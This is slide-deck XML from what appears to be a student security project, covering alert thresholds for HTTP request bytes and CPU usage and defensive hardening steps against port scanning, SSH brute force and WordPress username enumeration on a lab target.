          <p:cNvPr id="376" name="Google Shape;376;p4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377" name="Google Shape;377;p49"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is monitoring the ‘http.request.bytes’ metric.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it fires at?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The threshold is reached if the sum of the bytes for http requests exceeds 3500 bytes for the previous minute.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="Google Shape;378;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4547050" y="7509650"/>
            <a:ext cx="13487400" cy="521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CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p5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385" name="Google Shape;385;p5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indent="-508000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This alert is monitoring the ‘system.process.cpu.total.pct’ metric.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it fires at?</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The threshold is reached if the max total percentage of CPU usage is over 0.5% for the previous five minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4851875" y="7552000"/>
            <a:ext cx="13449300" cy="4610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1"/>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392" name="Google Shape;392;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731288" y="5861000"/>
            <a:ext cx="22914900" cy="2070600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardening</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393" name="Google Shape;393;p5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Hardening Against V1: Port Scanning &amp; open SSH on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p5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00" name="Google Shape;400;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2113925"/>
            <a:ext cx="22942800" cy="10840200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-514350" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To prevent Port scanning on your IP, a well configured firewall will be needed to alert and prevent any information to be gathered.</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress has Firewall Plugins available for easy installation for non-developer users that routes website traffic through a cloud proxy server.</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All traffic should be denied by default. Then, only allowed traffic is added in. Choose the allowed traffic based on the following parameters:</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination Port</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol of the Traffic </a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-514350" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It works because only legitimate users can access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="18000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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401" name="Google Shape;401;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10578775" y="7951850"/>
            <a:ext cx="3810000"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ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hardening Against V2: Brute-Force attack on Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p5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08" name="Google Shape;408;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="2163526"/>
            <a:ext cx="24377700" cy="10812300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limit failed login attempts</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Account Lockouts with progressive delays</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require password complexity, length, character set, and history. </a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Require multi-factor authentication. </a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Make the root user inaccessible via SSH by editing the sshd_config file</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set the ‘DenyUsers root’ and ‘PermitRootLogin no’ options</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Captcha</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highly effective against bots</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limit logins to a specified IP address or range</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-550862" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor server logs</a:t>
            </a:r>
            <a:endParaRPr sz="20300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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sz="5400"/>
              <a:t>Hardening Against V3 “Enumerate usernames in WordPress” on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p5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15" name="Google Shape;415;p5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46100" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
